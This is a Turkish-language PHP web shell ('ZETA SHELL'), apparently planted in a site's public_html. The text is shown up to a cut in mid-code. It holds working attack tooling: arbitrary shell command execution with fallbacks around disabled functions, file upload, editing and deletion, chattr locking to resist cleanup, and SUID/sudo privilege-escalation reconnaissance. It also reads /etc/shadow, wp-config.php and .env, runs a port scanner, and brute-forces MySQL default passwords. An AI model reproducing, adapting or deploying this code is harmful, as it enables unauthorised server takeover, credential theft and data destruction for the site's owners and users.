File: /home/prospack/public_html/zwso.php
<?php
@ob_start(); // OUTPUT BUFFERING BAŞLAT! EN BAŞTA OLMALI!
// !!!!! HATA AYIKLAMA KAPALI (Varsayılan) - GEREKİRSE AÇ !!!!!
// error_reporting(E_ALL);
// ini_set('display_errors', 1);
// ini_set('log_errors', 1);
// !!!!! HATA AYIKLAMA SONU !!!!!
# --- ZETA SHELL Konfigurasyon ---
$SHELL_VERSION = "";
// Kimlik Bilgileri (Kodlanmış)
$_zeta_uk ='bmVzYXM';
$_zeta_ps = 'bmVzYXM';
// --- Oturum Yönetimi ---
if (session_status() == PHP_SESSION_NONE) { @session_start(); }
# --- Giriş Kontrolü (Gizlenmiş Kimlik Bilgileri) ---
function checkLogin($kullaniciAdi_encoded, $sifre_encoded) {
$confUser = trim(@base64_decode($kullaniciAdi_encoded));
$confPass = trim(@base64_decode($sifre_encoded));
if (!isset($_SESSION['loggedIn']) || $_SESSION['loggedIn'] !== true) {
if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['zeta_user']) && isset($_POST['zeta_pass'])) {
$postUser = trim($_POST['zeta_user']);
$postPass = trim($_POST['zeta_pass']);
if ($postUser === $confUser && $postPass === $confPass) {
$_SESSION['loggedIn'] = true;
$_SESSION['message'] = 'Giriş Başarılı! Kainat Kontrol Paneli Aktif! 🔥';
$_SESSION['message_type'] = 'success';
$current_uri = $_SERVER['PHP_SELF'];
$query_string = isset($_SERVER['QUERY_STRING']) ? $_SERVER['QUERY_STRING'] : '';
parse_str($query_string, $query_params);
unset($query_params['logout']);
$new_query_string = http_build_query($query_params);
$redirect_url = $current_uri . ($new_query_string ? '?' . $new_query_string : '');
header('Location: ' . $redirect_url);
exit;
} else {
renderLogin('Hatalı Giriş AMK! 🤬'); exit;
}
} else {
renderLogin(); exit;
}
}
if (isset($_GET['logout'])) {
session_unset(); session_destroy();
header('Location: ' . strtok($_SERVER["REQUEST_URI"], '?')); exit;
}
} // checkLogin sonu
// --- Giriş Formu Render Fonksiyonu ---
function renderLogin($error_msg = null) {
global $SHELL_VERSION;
@ob_end_clean();
die('<!DOCTYPE html><html><head><title>ZETA SHELL LOGIN</title><link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.5.1/css/all.min.css"><link href="https://fonts.googleapis.com/css2?family=Oxanium:wght@400;700&display=swap" rel="stylesheet"><style>body{margin:0;font-family:'Oxanium',monospace;background-color:#1c2024;color:#f0f4f8;display:flex;justify-content:center;align-items:center;height:100vh;overflow:hidden}#login-screen{z-index:9999;background:#2a3038;padding:40px 50px;border:1px solid #3498db;border-radius:10px;box-shadow:0 10px 30px rgba(0,0,0,.5), 0 0 10px rgba(52,152,219,.3);width:350px;text-align:center;color:#3498db;transform:scale(1);animation:appear .5s ease-out}@keyframes appear{from{opacity:0;transform:scale(.8)}to{opacity:1;transform:scale(1)}}#login-screen h1,h2{margin-top:0;margin-bottom:20px;color:#3498db;text-shadow:0 0 5px rgba(52,152,219,.5)}#login-screen input[type="password"],#login-screen input[type="text"]{width:100%;padding:16px;margin-bottom:25px;background:#1c2024;border:1px solid #4a515c;border-radius:5px;color:#f0f4f8;box-sizing:border-box;font-size:18px;text-align:center;transition:border-color .3s, box-shadow .3s}#login-screen input[type="password"]:focus,#login-screen input[type="text"]:focus{border-color:#3498db;box-shadow:0 0 8px rgba(52,152,219,.5);outline:none}#login-screen input[type="submit"]{width:100%;padding:14px;background:#3498db;color:#1c2024;cursor:pointer;font-weight:700;border:none;border-radius:5px;font-family:'Oxanium',monospace;font-size:18px;transition:background-color .3s ease}#login-screen input[type="submit"]:hover{background:#5dadec}@keyframes pulse-blue{0%{background-color:#004f7f;box-shadow:0 0 5px rgba(52,152,219,.7)}100%{background-color:#006aa3;box-shadow:0 0 10px rgba(52,152,219,.5)}}.login-error{color:#f0f4f8;background-color:#004f7f;padding:12px;border:1px solid #3498db;border-radius:5px;font-weight:700;margin-bottom:20px;animation:pulse-blue 1s infinite alternate}</style></head><body><div id="login-screen"><h1><i class="fas fa-terminal"></i> ZETA SHELL ' . $SHELL_VERSION . '</h1><h2>NESAS_0DAY</h2>'.($error_msg ? '<p class="login-error">'.$error_msg.'</p>' : '').'<form method="POST" autocomplete="off"><input type="text" name="zeta_user" placeholder="KULLANICI ADI" required><input type="password" name="zeta_pass" placeholder="ŞİFRE" required><input type="submit" name="giris" value="LOG IN"></form></div></body></html>');
} // renderLogin sonu
// Giriş kontrolünü YAP! (Kodlanmış değişkenleri gönder)
checkLogin($_zeta_uk, $_zeta_ps);
// --- Helper Fonksiyonlar ---
function formatSizeUnits($bytes) { if ($bytes === false || $bytes === null) return '???'; if ($bytes >= 1073741824) { $bytes = number_format($bytes / 1073741824, 2) . ' GB'; } elseif ($bytes >= 1048576) { $bytes = number_format($bytes / 1048576, 2) . ' MB'; } elseif ($bytes >= 1024) { $bytes = number_format($bytes / 1024, 2) . ' KB'; } elseif ($bytes > 1) { $bytes = $bytes . ' bytes'; } elseif ($bytes == 1) { $bytes = $bytes . ' byte'; } else { $bytes = '0 bytes'; } return $bytes; }
function fileExtension($file) { $file = rtrim($file, '/'); $pos = strrpos($file, '.'); if ($pos === false) { return ''; } return strtolower(substr($file, $pos + 1)); }
function perms_to_string($perms) { if ($perms === false || $perms === null) return '????'; $info = ''; if (($perms & 0xC000) == 0xC000) $info = 's'; elseif (($perms & 0xA000) == 0xA000) $info = 'l'; elseif (($perms & 0x8000) == 0x8000) $info = '-'; elseif (($perms & 0x6000) == 0x6000) $info = 'b'; elseif (($perms & 0x4000) == 0x4000) $info = 'd'; elseif (($perms & 0x2000) == 0x2000) $info = 'c'; elseif (($perms & 0x1000) == 0x1000) $info = 'p'; else $info = 'u'; $info .= (($perms & 0x0100) ? 'r' : '-'); $info .= (($perms & 0x0080) ? 'w' : '-'); $info .= (($perms & 0x0040) ? (($perms & 0x0800) ? 's' : 'x' ) : (($perms & 0x0800) ? 'S' : '-')); $info .= (($perms & 0x0020) ? 'r' : '-'); $info .= (($perms & 0x0010) ? 'w' : '-'); $info .= (($perms & 0x0008) ? (($perms & 0x0400) ? 's' : 'x' ) : (($perms & 0x0400) ? 'S' : '-')); $info .= (($perms & 0x0004) ? 'r' : '-'); $info .= (($perms & 0x0002) ? 'w' : '-'); $info .= (($perms & 0x0001) ? (($perms & 0x0200) ? 't' : 'x' ) : (($perms & 0x0200) ? 'T' : '-')); return $info; }
function encodePath($path) { return rtrim(strtr(base64_encode($path), '+/', '-_'), '='); }
function decodePath($path) { return base64_decode(strtr($path, '-_', '+/')); }
function runCommand($cmd) { $output = ''; $retval = -1; $disabled_funcs = @ini_get('disable_functions'); $use_func = ''; if (function_exists('shell_exec') && stripos($disabled_funcs, 'shell_exec') === false) $use_func = 'shell_exec'; elseif (function_exists('system') && stripos($disabled_funcs, 'system') === false) $use_func = 'system'; elseif (function_exists('passthru') && stripos($disabled_funcs, 'passthru') === false) $use_func = 'passthru'; elseif (function_exists('exec') && stripos($disabled_funcs, 'exec') === false) $use_func = 'exec'; elseif (function_exists('proc_open') && stripos($disabled_funcs, 'proc_open') === false) $use_func = 'proc_open'; try { $cmd_full = $cmd . ' 2>&1'; switch ($use_func) { case 'shell_exec': $output = shell_exec($cmd_full); break; case 'system': ob_start(); system($cmd_full, $retval); $output = ob_get_contents(); ob_end_clean(); break; case 'passthru': ob_start(); passthru($cmd_full, $retval); $output = ob_get_contents(); ob_end_clean(); break; case 'exec': exec($cmd_full, $output_array, $retval); $output = implode("n", $output_array); break; case 'proc_open': $cwd = defined('PATH') ? PATH : null; $descriptorspec = array(0 => array("pipe", "r"), 1 => array("pipe", "w"), 2 => array("pipe", "w")); $process = proc_open($cmd, $descriptorspec, $pipes, $cwd); if (is_resource($process)) { fclose($pipes[0]); $output = stream_get_contents($pipes[1]); fclose($pipes[1]); $error = stream_get_contents($pipes[2]); fclose($pipes[2]); $retval = proc_close($process); if (!empty($error)) $output .= "nSTDERR:n" . $error; } else { $output = "proc_open failed."; $retval = -1; } break; default: $output = "KOMUT FONKSIYONLARI KAPALI!"; $retval = -1; break; } } catch (Exception $e) { $output = "Komut hatası: " . $e->getMessage(); $retval = -1; } $trimmed_output = trim(isset($output) ? (string)$output : ''); return array('output' => htmlspecialchars($trimmed_output), 'retval' => $retval); }
function is_really_writable($file) { if (DIRECTORY_SEPARATOR == '/' && @ini_get("safe_mode") == FALSE) { return @is_writable($file); } if (!@file_exists($file)) { return false; } if (@is_dir($file)) { $file = rtrim($file, '/') . '/' . md5(mt_rand(1, 100) . mt_rand(1, 100)); if (($fp = @fopen($file, 'w')) === FALSE) { return FALSE; } fclose($fp); @chmod($file, 0777); @unlink($file); return TRUE; } else { if (!($fp = @fopen($file, 'ab'))) { return FALSE; } fclose($fp); return TRUE; } }
function getServerIP() { return isset($_SERVER['SERVER_ADDR']) ? $_SERVER['SERVER_ADDR'] : (isset($_SERVER['LOCAL_ADDR']) ? $_SERVER['LOCAL_ADDR'] : 'N/A'); }
function fileIcon($file) { $full_path = PATH . '/' . $file; $ext = fileExtension($file); $imgs = array("apng", "avif", "gif", "jpg", "jpeg", "jfif", "pjpeg", "pjp", "png", "svg", "webp", "ico"); $audio = array("wav", "m4a", "m4b", "mp3", "ogg", "webm", "mpc", "flac", "aac"); $video = array("mp4", "mov", "avi", "mkv", "webm", "flv", "wmv"); $code = array("php", "phtml", "html", "htm", "css", "js", "jsx", "ts", "py", "rb", "java", "c", "cpp", "cs", "go", "swift", "kt", "sh", "bash", "zsh", "sql", "json", "xml", "yaml", "yml", "ini", "conf", "tpl", "twig", "blade"); $archive = array("zip", "rar", "tar", "gz", "7z", "bz2", "xz", "iso", "jar", "tgz", "tbz2"); $doc = array("pdf", "doc", "docx", "xls", "xlsx", "ppt", "pptx", "odt", "ods", "odp", "rtf"); try { if (@is_link($full_path)) return '<i class="fas fa-link hacker-icon-link"></i> '; if (@is_dir($full_path)) return '<i class="fas fa-folder-open hacker-icon-folder"></i> '; } catch(Exception $e) { /* Ignore readlink errors etc. */ } if ($file == "error_log") return '<i class="fas fa-bug hacker-icon-error"></i> '; if ($file == ".htaccess" || $file == ".htpasswd" || strpos($file, '.conf') !== false || strpos($file, '.ini') !== false || $ext == 'env') return '<i class="fas fa-cog hacker-icon-config"></i> '; if (in_array($ext, $code)) return '<i class="fas fa-file-code hacker-icon-code"></i> '; if (in_array($ext, $imgs)) return '<i class="fas fa-file-image hacker-icon-image"></i> '; if (in_array($ext, $audio)) return '<i class="fas fa-file-audio hacker-icon-audio"></i> '; if (in_array($ext, $video)) return '<i class="fas fa-file-video hacker-icon-video"></i> '; if (in_array($ext, $archive)) return '<i class="fas fa-file-archive hacker-icon-archive"></i> '; if (in_array($ext, $doc)) return '<i class="fas fa-file-pdf hacker-icon-doc"></i> '; if ($ext == "txt" || $ext == "md" || $ext == "log") return '<i class="fas fa-file-alt hacker-icon-text"></i> '; return '<i class="fas fa-file hacker-icon-default"></i> '; }
function deleteDirRecursive($dirPath) { if (! is_dir($dirPath)) { return false; } if (substr($dirPath, strlen($dirPath) - 1, 1) != '/') { $dirPath .= '/'; } $files = glob($dirPath . '*', GLOB_MARK); if ($files === false) { return false; } foreach ($files as $file) { if (is_link($file)) { @unlink($file); } elseif (is_dir($file)) { deleteDirRecursive($file); } else { @unlink($file); } } return @rmdir($dirPath); }
// --- PATH Belirleme ---
$script_path = dirname(__FILE__); $doc_root = isset($_SERVER['DOCUMENT_ROOT']) ? $_SERVER['DOCUMENT_ROOT'] : $script_path; $current_path = $script_path;
if (isset($_GET['p'])) { $decoded_p = decodePath($_GET['p']); $real_p = @realpath($decoded_p); if ($real_p !== false && @is_dir($real_p) && @is_readable($real_p)) { $current_path = $real_p; } elseif (@is_dir($decoded_p) && @is_readable($decoded_p)) { $current_path = $decoded_p; } else { $current_path = $script_path; $_SESSION['message'] = 'Hata: Yol geçersiz/okunamıyor! (' . htmlspecialchars($decoded_p) . ')'; $_SESSION['message_type'] = 'error'; } } else { $current_path = $script_path; }
$current_path = str_replace('\', '/', $current_path); if ($current_path !== '/') { $current_path = rtrim($current_path, '/'); } if (empty($current_path)) { $current_path = '/'; }
define("PATH", $current_path);
// --- POST ve GET İşlemleri ---
$message = isset($_SESSION['message']) ? $_SESSION['message'] : ''; $message_type = isset($_SESSION['message_type']) ? $_SESSION['message_type'] : ''; unset($_SESSION['message'], $_SESSION['message_type']);
$action_result_output = '';
$opened_details = '';
function set_message_and_redirect($msg, $type, $path_to_redirect = null) {
$_SESSION['message'] = $msg;
$_SESSION['message_type'] = $type;
$redirect_url = '?p=' . urlencode(encodePath($path_to_redirect ?: PATH));
header('Location: ' . $redirect_url); exit;
}
if (isset($_GET['dl']) && isset($_GET['file']) && isset($_GET['p'])) {
$dl_path = decodePath($_GET['p']);
$file_to_download = urldecode($_GET['file']);
$file_path = rtrim($dl_path, '/') . "/" . $file_to_download;
if (!is_file($file_path)) {
set_message_and_redirect('Hata: İndirilecek öğe dosya değil!', 'error', $dl_path);
} elseif (!is_readable($file_path)) {
set_message_and_redirect('Hata: Dosya okunamıyor, indirilemez!', 'error', $dl_path);
} else {
header('Content-Description: File Transfer');
header('Content-Type: application/octet-stream');
header('Content-Disposition: attachment; filename="' . basename($file_path) . '"');
header('Expires: 0');
header('Cache-Control: must-revalidate');
header('Pragma: public');
header('Content-Length: ' . filesize($file_path));
@ob_clean(); @flush(); @readfile($file_path);
exit;
}
}
if (isset($_GET['ajax_get_content']) && isset($_GET['file']) && isset($_GET['p'])) {
header('Content-Type: application/json');
$ajax_path = decodePath($_GET['p']);
$ajax_file = urldecode($_GET['file']);
$full_ajax_path = rtrim($ajax_path, '/') . '/' . $ajax_file;
if (!file_exists($full_ajax_path) || !is_file($full_ajax_path)) {
echo json_encode(['success' => false, 'error' => 'Dosya yok!']);
} elseif (!is_readable($full_ajax_path)) {
echo json_encode(['success' => false, 'error' => 'Okunamıyor!']);
} else {
$content = @file_get_contents($full_ajax_path);
if ($content === false) {
echo json_encode(['success' => false, 'error' => 'Okuma hatası!']);
} else {
$content_utf8 = mb_convert_encoding($content, 'UTF-8', mb_detect_encoding($content, 'UTF-8, ISO-8859-9, ISO-8859-1', true));
echo json_encode(['success' => true, 'filename' => htmlspecialchars($ajax_file), 'content' => $content_utf8]);
}
}
exit;
}
if ($_SERVER['REQUEST_METHOD'] === 'POST') {
if (isset($_POST["upload"])) { if(isset($_FILES["fileToUpload"]) && $_FILES["fileToUpload"]["error"] == UPLOAD_ERR_OK) { $target_file = PATH . "/" . basename($_FILES["fileToUpload"]["name"]); if (!is_really_writable(PATH)) { $msg='Hata: Dizin yazılamıyor!'; $type='error'; } elseif (@move_uploaded_file($_FILES["fileToUpload"]["tmp_name"], $target_file)) { $msg = htmlspecialchars(basename($_FILES["fileToUpload"]["name"])).' yüklendi! 😉'; $type='success'; } else { $msg='Hata: Yüklenemedi!'; $type='error'; } } else { $upload_error = isset($_FILES["fileToUpload"]["error"]) ? $_FILES["fileToUpload"]["error"] : UPLOAD_ERR_NO_FILE; $php_upload_errors = array( UPLOAD_ERR_INI_SIZE=>'php.ini limit!', UPLOAD_ERR_FORM_SIZE=>'Form limit!', UPLOAD_ERR_PARTIAL=>'Yarım!', UPLOAD_ERR_NO_FILE=>'Dosya yok!', UPLOAD_ERR_NO_TMP_DIR=>'Tmp yok!', UPLOAD_ERR_CANT_WRITE=>'Yazılamadı!', UPLOAD_ERR_EXTENSION=>'Eklenti engeli!'); $error_message = isset($php_upload_errors[$upload_error]) ? $php_upload_errors[$upload_error] : 'Bilinmeyen hata.'; $msg = 'Hata: ' . $error_message; $type='error'; } set_message_and_redirect($msg, $type, PATH); }
elseif (isset($_POST['rename'])) { $original_path = PATH . "/" . $_POST['original_name']; $new_path = PATH . "/" . $_POST['new_name']; if (!file_exists($original_path)) { $msg='Hata: Orijinal yok!'; $type='error'; } elseif (empty(trim($_POST['new_name']))) { $msg='Hata: Yeni isim boş!'; $type='error'; } elseif ($original_path === $new_path) { $msg='İsimler aynı!'; $type='info'; } elseif (@rename($original_path, $new_path)) { $msg='Yeniden adlandırıldı! 😎'; $type='success'; } else { $msg='Hata: Adlandırılamadı! İzin? 🖕'; $type='error'; } set_message_and_redirect($msg, $type, PATH); }
elseif(isset($_POST['edit'])) { $filename = PATH."/".$_POST['file_to_save']; if (!is_really_writable($filename)) { $msg='Hata: Dosya yazılamıyor!'; $type='error'; } else { $data = $_POST['data']; if (function_exists('get_magic_quotes_gpc') && get_magic_quotes_gpc()) { $data = stripslashes($data); } if(@file_put_contents($filename, $data) !== false) { $msg='Dosya kaydedildi! ✅'; $type='success'; } else { $msg='Hata: Kaydedilemedi! ❌'; $type='error'; } } set_message_and_redirect($msg, $type, PATH); }
elseif (isset($_POST['delete_item'])) { $item_to_delete = $_POST['item_name']; $item_path = PATH . "/" . $item_to_delete; $success = false; $error_msg = 'Bilinmeyen silme hatası!'; if (!file_exists($item_path)) { $error_msg = 'Öğe bulunamadı!'; } elseif (is_link($item_path)) { if (@unlink($item_path)) { $success = true; $msg = 'Link SİLİNDİ!'; } else { $error_msg = 'Link silinemedi!'; } } elseif (is_file($item_path)) { if (@unlink($item_path)) { $success = true; $msg = 'Dosya SİLİNDİ!'; } else { $error_msg = 'Dosya silinemedi!'; } } elseif (is_dir($item_path)) { try { if (deleteDirRecursive($item_path)) { $success = true; $msg = 'Dizin ve içindekiler SİLİNDİ! 🔥'; } else { $error_msg = 'Dizin silinemedi! İzin?'; } } catch (Exception $e) { $error_msg = 'Hata: ' . $e->getMessage(); } } if ($success) { set_message_and_redirect($msg, 'success', PATH); } else { set_message_and_redirect('Hata: ' . $error_msg, 'error', PATH); } }
elseif (isset($_POST['chmod_item'])) { $file_to_chmod = PATH . '/' . $_POST['item_name']; $new_perm_str = $_POST['new_perm']; if (!file_exists($file_to_chmod)) { $msg='Hata: Öğe yok!'; $type='error'; } elseif (!preg_match('/^[0-7]{3,4}$/', $new_perm_str)) { $msg='Hata: Geçersiz izin formatı!'; $type='error'; } else { $new_perm = octdec($new_perm_str); if (@chmod($file_to_chmod, $new_perm)) { $msg = 'İzinler ' . sprintf('%04o', $new_perm) . ' oldu! 🔧'; $type = 'success'; } else { $msg = 'Hata: Chmod başarısız!'; $type = 'error'; } } set_message_and_redirect($msg, $type, PATH); }
elseif (isset($_POST['chattr_item'])) { $file_to_chattr = PATH . '/' . $_POST['item_name']; $attr_cmd = $_POST['attr_action'] == 'lock' ? '+i' : '-i'; $command = "chattr " . $attr_cmd . " " . escapeshellarg($file_to_chattr); $cmd_result = runCommand($command); if (stripos($cmd_result['output'], 'Operation not permitted') === false && stripos($cmd_result['output'], 'No such file') === false && stripos($cmd_result['output'], 'command not found') === false && $cmd_result['retval'] <= 1) { $msg = 'chattr ' . $attr_cmd . ' denendi. 😎'; $type = 'success'; } else { $msg = 'Hata: chattr başarısız: ' . $cmd_result['output']; $type = 'error'; } set_message_and_redirect($msg, $type, PATH); }
elseif (isset($_POST['create_item'])) { $item_name = trim($_POST['item_name']); $item_type = $_POST['item_type']; if (empty($item_name)) { $msg='Hata: İsim boş!'; $type='error'; set_message_and_redirect($msg, $type, PATH);} else { $new_item_path = PATH . '/' . $item_name; if (file_exists($new_item_path)) { $msg='Hata: Zaten var!'; $type='error'; set_message_and_redirect($msg, $type, PATH); } else { $success = false; $error_msg = 'Oluşturma hatası!'; if ($item_type == 'file') { if (@touch($new_item_path)) { $success = true; $msg = 'Dosya yaratıldı!'; } else { $error_msg = 'Dosya yaratılamadı!'; } } elseif ($item_type == 'dir') { if (@mkdir($new_item_path, 0755)) { $success = true; $msg = 'Dizin yaratıldı!'; } else { $error_msg = 'Dizin yaratılamadı!'; } } if ($success) { set_message_and_redirect($msg, 'success', PATH); } else { set_message_and_redirect('Hata: ' . $error_msg, 'error', PATH); } } } }
elseif (isset($_POST['archive_item'])) { $item_name = $_POST['item_name']; $item_path = PATH . "/" . $item_name; $archive_type = $_POST['archive_type']; $archive_name = $item_name . '.' . $archive_type; $cmd = ''; if (!file_exists($item_path)) { $msg='Hata: Öğe yok!'; $type='error'; } else { if ($archive_type == 'zip') { $cmd = "zip -r " . escapeshellarg($archive_name) . " " . escapeshellarg($item_name); } elseif ($archive_type == 'tar') { $archive_name .= '.gz'; $cmd = "tar -czvf " . escapeshellarg($archive_name) . " " . escapeshellarg($item_name); } if ($cmd) { $result = runCommand($cmd); if ($result['retval'] == 0) { $msg = $archive_name . ' oluşturuldu! 📦'; $type = 'success'; } else { $msg = 'Hata: Arşivlenemedi! ' . $result['output']; $type = 'error'; } } else { $msg = 'Hata: Geçersiz tür.'; $type = 'error'; } } set_message_and_redirect($msg, $type, PATH); }
elseif (isset($_POST['extract_item'])) { $item_name = $_POST['item_name']; $item_path = PATH . "/" . $item_name; $ext = fileExtension($item_name); $cmd = ''; if (!file_exists($item_path) || !is_file($item_path)) { $msg='Hata: Arşiv yok!'; $type='error'; } else { if ($ext == 'zip') { $cmd = "unzip " . escapeshellarg($item_path) . " -d " . escapeshellarg(PATH); } elseif (($ext == 'gz' && strpos($item_name, '.tar.gz') !== false) || ($ext == 'tgz')) { $cmd = "tar -xzvf " . escapeshellarg($item_path) . " -C " . escapeshellarg(PATH); } elseif ($ext == 'tar') { $cmd = "tar -xvf " . escapeshellarg($item_path) . " -C " . escapeshellarg(PATH); } elseif (($ext == 'bz2' && strpos($item_name, '.tar.bz2') !== false) || ($ext == 'tbz2')) { $cmd = "tar -xjvf " . escapeshellarg($item_path) . " -C " . escapeshellarg(PATH); } elseif ($ext == 'rar') { $cmd = "unrar x " . escapeshellarg($item_path) . " " . escapeshellarg(PATH); } if ($cmd) { $result = runCommand($cmd); if ($result['retval'] == 0 || stripos($result['output'], 'error') === false) { $msg = $item_name . ' açıldı! 🎉'; $type = 'success'; } else { $msg = 'Hata: Açılamadı! ' . $result['output']; $type = 'error'; } } else { $msg = 'Hata: Desteklenmeyen tür.'; $type = 'error'; } } set_message_and_redirect($msg, $type, PATH); }
elseif (isset($_POST['search_files'])) { $search_term = $_POST['search_term']; if (empty($search_term)) { $action_result_output = "Arama terimi boş olamaz!"; } else { $search_cmd = "find " . escapeshellarg(PATH) . " -maxdepth 1 -name '*" . escapeshellarg($search_term) . "*' -print"; $cmd_result = runCommand($search_cmd); $action_result_output = "--- Arama Sonuçları ('" . htmlspecialchars($search_term) . "') ---n" . ($cmd_result['output'] ?: 'Sonuç bulunamadı.'); } $opened_details = 'files'; }
elseif(isset($_POST['run_command'])) { $cmd = $_POST['command']; $cmd_result = runCommand($cmd); $action_result_output = "<b>Komut:</b> " . htmlspecialchars($cmd) . "n--- Çıktı ---n" . $cmd_result['output']; $opened_details = 'command'; }
elseif(isset($_POST['analyze_system'])) { $analysis_output = "--- OS/Kernel ---n"; $analysis_output .= runCommand('uname -a')['output'] . "n"; $os_release = @file_get_contents('/etc/os-release'); $analysis_output .= ($os_release ? "--- /etc/os-release ---n" . htmlspecialchars($os_release) . "n" : runCommand('cat /etc/issue')['output'] . "n"); $analysis_output .= "--- Sudo ---n"; $analysis_output .= runCommand('sudo -V 2>&1')['output'] . "n"; $analysis_output .= "--- SUID/SGID ---n"; $analysis_output .= "SUID:n" . runCommand('find / -perm -4000 -type f -ls 2>/dev/null')['output'] . "n"; $analysis_output .= "SGID:n" . runCommand('find / -perm -2000 -type f -ls 2>/dev/null')['output'] . "n"; $analysis_output .= "n--- ÖNERİLER ---n* Exploit-DB / searchsploitn* Sudo versiyonu / GTFOBinsn* sudo -ln"; $action_result_output = $analysis_output; $opened_details = 'system'; }
elseif(isset($_POST['run_network_tool'])) { $tool = $_POST['network_tool']; $target = $_POST['network_target']; $cmd = ''; switch ($tool) { case 'ping': $cmd = "ping -c 4 " . escapeshellarg($target); break; case 'traceroute': $cmd = "traceroute " . escapeshellarg($target); break; case 'portscan_fsockopen': $ports_to_scan_str = trim($_POST['network_ports']); if (empty($ports_to_scan_str)) { $ports_to_scan = array(21, 22, 23, 25, 53, 80, 110, 143, 443, 465, 587, 993, 995, 3306, 5432, 8080, 8443); } else { $ports_to_scan = array_map('intval', explode(',', $ports_to_scan_str)); } $scan_result = "--- fsockopen Port Scan (" . htmlspecialchars($target) . ") ---n"; $timeout = 1; foreach($ports_to_scan as $p) { if ($p > 0 && $p <= 65535) { $conn = @fsockopen($target, $p, $errno, $errstr, $timeout); if ($conn) { $scan_result .= "Port " . $p . ": AÇIK 🎉n"; @fclose($conn); } } } $action_result_output = $scan_result . "(Sadece açıklar)n"; break; case 'curl_req': $curl_cmd = "curl -k -i -L --connect-timeout 5 " . escapeshellarg($target); $cmd_result = runCommand($curl_cmd); $action_result_output = "--- cURL Sonucu (" . htmlspecialchars($target) . ") ---n" . $cmd_result['output']; break; } if ($cmd && $tool != 'portscan_fsockopen' && $tool != 'curl_req') { $cmd_result = runCommand($cmd); $action_result_output = "--- " . htmlspecialchars($tool) . " Sonucu (" . htmlspecialchars($target) . ") ---n" . $cmd_result['output']; } elseif (empty($action_result_output)) { $action_result_output = "Hata: Geçersiz araç/hedef veya işlem başarısız."; } $opened_details = 'network'; }
elseif (isset($_POST['run_db_query'])) { $db_host = $_POST['db_host']; $db_user = $_POST['db_user']; $db_pass = $_POST['db_pass']; $db_name = $_POST['db_name']; $db_query = $_POST['db_query']; if (function_exists('get_magic_quotes_gpc') && get_magic_quotes_gpc()) { $db_query = stripslashes($db_query); } $db_output = "--- DB Sorgu ({$db_host} / {$db_name}) --- 🐬n"; if (!function_exists('mysqli_connect')) { $db_output .= "Hata: PHP MySQLi yok!"; } else { $conn = @mysqli_connect($db_host, $db_user, $db_pass, $db_name); if (!$conn) { $db_output .= "Bağlantı Hatası: " . mysqli_connect_error() . " 🤬"; } else { $db_output .= "Bağlantı OK! ✅n"; $result = @mysqli_query($conn, $db_query); if (!$result) { $db_output .= "Sorgu Hatası: " . mysqli_error($conn) . "n"; } else { if ($result instanceof mysqli_result) { $num_rows = mysqli_num_rows($result); $db_output .= "Sorgu OK (" . $num_rows . " satır)nn"; if ($num_rows > 0) { $fields = mysqli_fetch_fields($result); $header = ""; foreach ($fields as $field) { $header .= $field->name . "t | "; } $db_output .= rtrim($header, "t | ") . "n" . str_repeat("-", strlen($header) * 1.1) . "n"; while ($row = mysqli_fetch_assoc($result)) { $line = ""; foreach ($row as $col) { $line .= ($col === null ? 'NULL' : $col) . "t | "; } $db_output .= rtrim($line, "t | ") . "n"; } } mysqli_free_result($result); } else { $affected_rows = mysqli_affected_rows($conn); $db_output .= "Sorgu OK (" . $affected_rows . " satır etkilendi)n"; } } @mysqli_close($conn); } } $action_result_output = $db_output; $opened_details = 'database'; }
elseif(isset($_POST['run_helper_tool'])) { $helper_tool = $_POST['helper_tool']; $helper_input = $_POST['helper_input']; if (function_exists('get_magic_quotes_gpc') && get_magic_quotes_gpc()) { $helper_input = stripslashes($helper_input); } $helper_output = ''; switch($helper_tool) { case 'base64_encode': $helper_output = base64_encode($helper_input); break; case 'base64_decode': $helper_output = @base64_decode($helper_input); if ($helper_output === false) $helper_output = "Hata: Geçersiz Base64!"; break; case 'md5': $helper_output = md5($helper_input); break; case 'sha1': $helper_output = sha1($helper_input); break; case 'url_encode': $helper_output = urlencode($helper_input); break; case 'url_decode': $helper_output = urldecode($helper_input); break; default: $helper_output = "Bilinmeyen araç!"; } $action_result_output = "--- " . strtoupper($helper_tool) . " Sonucu --- n" . htmlspecialchars($helper_output); $opened_details = 'helpers'; }
elseif (isset($_POST['read_config_post'])) { $config_file = ''; $common_configs = array( 'passwd' => '/etc/passwd', 'shadow' => '/etc/shadow', 'wpconfig' => PATH . '/wp-config.php', 'wpconfig_up' => dirname(PATH) . '/wp-config.php', 'env' => PATH . '/.env', 'env_up' => dirname(PATH) . '/.env', 'apache_conf' => '/etc/apache2/apache2.conf', 'nginx_conf' => '/etc/nginx/nginx.conf', 'php_ini' => php_ini_loaded_file() ?: '/etc/php/php.ini', 'my_cnf' => '/etc/mysql/my.cnf', 'sshd_config' => '/etc/ssh/sshd_config' ); $config_key = $_POST['config_file_key']; if (isset($common_configs[$config_key])) { $config_file = $common_configs[$config_key]; } $config_content = @file_get_contents($config_file); if ($config_content !== false) { $action_result_output = "--- " . htmlspecialchars($config_file) . " ---⛏️nn" . htmlspecialchars($config_content); } elseif (!empty($config_file)) { $action_result_output = "Hata: Dosya (" . htmlspecialchars($config_file) . ") okunamadı! 🖕"; } else { $action_result_output = "Hata: Bilinmeyen config key."; } $opened_details = 'helpers'; }
elseif (isset($_POST['check_db_creds'])) { $db_host = trim($_POST['db_host_check']); $db_output = "--- MySQL Credential Check (" . htmlspecialchars($db_host) . ") --- 🐬n"; if (empty($db_host)) { $db_output .= "Hata: Host adresi girmedin amk!n"; } elseif (!function_exists('mysqli_connect')) { $db_output .= "Hata: PHP MySQLi eklentisi yok!n"; } else { $common_creds = array( 'root' => array('', 'root', 'toor', 'password', 'admin', '1234', '123456'), 'admin' => array('admin', 'password', '123456', 'root', ''), 'mysql' => array('mysql', 'password', ''), 'user' => array('user', 'password'), 'test' => array('test', 'password', '') ); $found_creds = array(); $port = 3306; $db_output .= "Deniyor...n"; @set_time_limit(60); foreach ($common_creds as $user => $passwords) { foreach ($passwords as $pass) { $conn = @mysqli_connect($db_host, $user, $pass, '', $port); if ($conn) { $found_creds[] = "✅ " . htmlspecialchars($user) . " / " . htmlspecialchars($pass === '' ? '(BOŞ ŞİFRE)' : $pass); @mysqli_close($conn); } } } if (!empty($found_creds)) { $db_output .= "n--- BULUNAN ŞİFRELER --- 🎉n"; $db_output .= implode("n", $found_creds); } else { $db_output .= "n--- Geçerli şifre bulunamadı / Bağlanılamadı! 😭 ---"; } } $action_result_output = $db_output; 